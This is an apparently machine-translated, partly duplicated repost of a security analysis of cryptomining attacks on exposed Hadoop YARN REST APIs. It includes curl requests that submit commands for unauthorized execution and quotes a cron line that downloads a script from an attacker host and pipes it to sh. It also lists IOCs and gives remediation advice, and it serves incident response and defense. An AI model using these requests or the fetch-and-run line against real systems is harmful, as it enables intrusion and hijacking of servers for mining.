Hadoop Yarn hack?

Take a look on top pscf

Original title: Hadoop Yarn REST API Unauthorized Vulnerability Mining Analysis

One, background

May 5th, Tencent’s cloud security team warned against the security issue of “attackers using the Hadoop Yarn resource management system REST API unauthorized vulnerability to attack the server and attackers can remotely execute code without authorization.” Before and after we had captured the relevant attack cases several times, which included the use of this issue for mining, we analyzed one of the cases and provided security recommendations and solutions for the response.

Second, the vulnerability description

Hadoop is a distributed system infrastructure developed by the Apache Foundation. YARN is a unified resource management platform on hadoop systems. Its main role is to achieve unified management and scheduling of cluster resources. The MapReduce computing framework can be run as an application program. Above the YARN system, resources are managed through YARN. Simply put, a user can submit specific application programs to YARN for execution, which allows the execution of related include system commands.

YARN provides REST APIs (defaults to the former) that are open by default in 8088 and 8090. Users are allowed to directly perform related application creation, task submission, and other operations through the API. If they are improperly configured, REST APIs will be opened in the public network and cause unauthorized access. The problem, then any hackers can use it for remote command execution, so as to conduct mining and other acts.

Attack step 1, apply for a new application

Read the following article…

Original title: Hadoop Yarn REST API Unauthorized Vulnerability Mining Analysis

One, background

May 5th, Tencent’s cloud security team warned against the security issue of “attackers using the Hadoop Yarn resource management system REST API unauthorized vulnerability to attack the server and attackers can remotely execute code without authorization.” Before and after we had captured the relevant attack cases several times, which included the use of this issue for mining, we analyzed one of the cases and provided security recommendations and solutions for the response.

Second, the vulnerability description

Hadoop is a distributed system infrastructure developed by the Apache Foundation. YARN is a unified resource management platform on hadoop systems. Its main role is to achieve unified management and scheduling of cluster resources. The MapReduce computing framework can be run as an application program. Above the YARN system, resources are managed through YARN. Simply put, a user can submit specific application programs to YARN for execution, which allows the execution of related include system commands.

YARN provides REST APIs (defaults to the former) that are open by default in 8088 and 8090. Users are allowed to directly perform related application creation, task submission, and other operations through the API. If they are improperly configured, REST APIs will be opened in the public network and cause unauthorized access. The problem, then any hackers can use it for remote command execution, so as to conduct mining and other acts.

Attack step 1, apply for a new application

POST requests directly through curl

Curl -v -X POST’http://ip:8088/ws/v1/cluster/apps/new-application'

The return content is similar to:

{ “application-id” : “application_1527144634877_20465” , “maximum-resource-capability” :{{ “memory” :16384, “vCores” :8}}

2, construct and submit the task

Construct json file 1.json, the content is as follows, where application-id corresponds to the id obtained above, the command content is to try to create 11112222_test_111122222 file in the /var/tmp directory, the content is also 111:

Then directly

Curl-s -i -X ​​POST -H ‘Accept: application/json’ -H ‘Content-Type: application/json’http://ip:8088/ws/v1/cluster/apps -data-binary @1. Json

You can complete the attack. The command is executed. You can see that the corresponding file is generated in the corresponding directory.

More details of the vulnerability can be found at http://bbs.qcloud.com/thread-50090-1-1.html

Third, intrusion analysis

In the case of this analysis, the victim machine deploys Hadoop YARN, and there is a security problem of unauthorized access. Hackers directly use the REST API opened in 8088 to submit execute commands to download and execute the .sh script in the server. Further downloads start the mining process to achieve the purpose of mining.

The whole process of use is relatively simple. By capturing Hadoop’s launch_container.sh script, we can see the commands executed by related tasks in one of the cases:

You can clearly see the location of line 8 and download and execute a script called x_wcr.sh from 185.222.210.59.

In the actual process, we captured multiple scripts such as cr.sh from multiple cases, but the actual function code is similar. We analyzed one of the x_wcr.sh scripts and the code from top to bottom:

This part of the code is mainly for the existing mining process, documents to clean up.

This part of the code is mainly to determine if /tmp/java is a file that exists and can be written, then determine whether the MD5 value matches, MD5 does not match according to the w.conf keyword to find and kill the process; if non-writable In the file, the DIR variable is re-assigned. This variable is mainly used to download the directory for storing mining and other programs.

Then the assignment of some variables, including re-judge if /tmp/java is a directory, then re-assign the DIR variable; determine whether the curl and wget commands exist, and if so, assign them to the WGET variable; f2 assigns an IP value, In fact, it is one of the servers for downloading related files.

This part of the code is the core of the code, download the mining Ifre method to the $ DIR directory and renamed to java by downloadIfNeed method, download the w.conf configuration file, add execute permissions to the mining program, and then run the nohup command background mining The program then deletes the configuration file; then the tasks in the crontab are checked. If there is no corresponding task, the task to execute the script will be downloaded “ * * * * * $LDRhttp://185.222.210.59/cr.sh|sh> /dev /null 2>&1” is added to it, where $LDR is wget -q -O — or curl, and the task is executed once every minute.

The script also contains download methods for several nested calls. The entry method is downloadIfNeed:

The core function of this method is to verify MD5 of the existing mining program. If it cannot be verified or the file does not exist, call the download method directly to download the mining program. If the file exists but MD5 does not match correctly, call the download method. After verifying again, if the verification fails, try to download the mining program from another download channel https://transfer.sh/WoGXx/zzz and verify again. Finally, the relevant results are reported to the re.php of the target server $f2.

Sample tmp.txt content:

The download method determines whether the ppc file exists or not matches MD5. If it does not exist or MD5 does not match, download2 is downloaded. If there is, the replication name is java.

The download2 method then determines that the system downloads the corresponding version of the mining program, where http://185.222.210.59/g.php returns another IP address; after the download is successful, it is verified again and the copy is renamed ppc.

In the last part of the script, there are some processes, files, crontab cleanup process, use pkill to delete the process that meets the conditions, delete the file in the tmp directory under pscd, and delete some tasks in crontab.

At this point, we complete the analysis of the entire script. Although the entire script is rather verbose, and it seems that each function is nested and called, and there are many files involved, in fact, the whole thing has done the following things:

1, clean up the related processes, files and crontab tasks
2. Judge and download the mining program, check the MD5 value at the same time. In addition to the server controlled by the hackers, use https://transfer.sh to provide backup download.

In fact, we can also see the corresponding traces by looking at YARN’s log file yarn-root-nodemanager-master.hadoop.log:

Or we can view the application details through the management UI:

The crontab task log can also see the relevant execution record:

Finally find the relevant files in the /var/tmp directory

Fourth, security advice to clean up the virus

1, use the top to view the process, kill the abnormal process
2, check / tmp and / var / tmp directory, delete java, ppc, w.conf and other abnormal files
3, check the crontab task list, delete the abnormal task
4, check the YARN log, confirm the abnormal application, delete processing

Security reinforcement

1. Configure access policies through iptables or security groups to limit access to ports such as the 8088
2. If it is not necessary, do not open the interface in the public network and change it to local or intranet call.
3. Upgrade Hadoop to version 2.x and enable Kerberos authentication to prevent anonymous access
4. Cloud Mirror currently supports this vulnerability detection. It also supports the discovery of mining Trojans. It is recommended to install the cloud mirror and open the Professional Edition to detect vulnerabilities and fix them in time, or to promptly receive a reminder after the horse is stopped.
5, more self-inspection and repair suggestions can refer to http://bbs.qcloud.com/thread-50090-1-1.html

V. IOCS wallet address

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

MD5

1, c8c1f2da51fbd0aea60e11a81236c9dc

2,183664ceb9c4d7179d5345249f1ee0c4

3, b00f4bbd82d2f5ec7c8152625684f853

Mine pool address

1,158.69.133.20:3333

2,192.99.142.249:3333

3, 202.144.193.110:3333

4,46.30.43.159:80

Some related URLs

1, ttp://185.222.210.59/x_wcr.sh

2, ttp://185.222.210.59/re.php

3, ttp://185.222.210.59/g.php

4, ttp://185.222.210.59/w.conf

5, ttp://185.222.210.59/cr.sh

6, ttp://192.99.142.226:8220/w.conf

7, ttp://192.99.142.226:8220/xm64

8, ttp://192.99.142.226:8220/cr.sh

9, ttp://95.142.40.83/xm64

10, ttp://95.142.40.83/xm32

11, ttps://transfer.sh/1o3Kj/zzz

12, ttps://transfer.sh/wbl5H/pscf

13, ttps://transfer.sh/WoGXx/zzz

* Author: Ding lab, please indicate from FreeBuf.COM

The latest website www.zuinow.com 2018–06–03 08:22:19

Mining sh ttp download application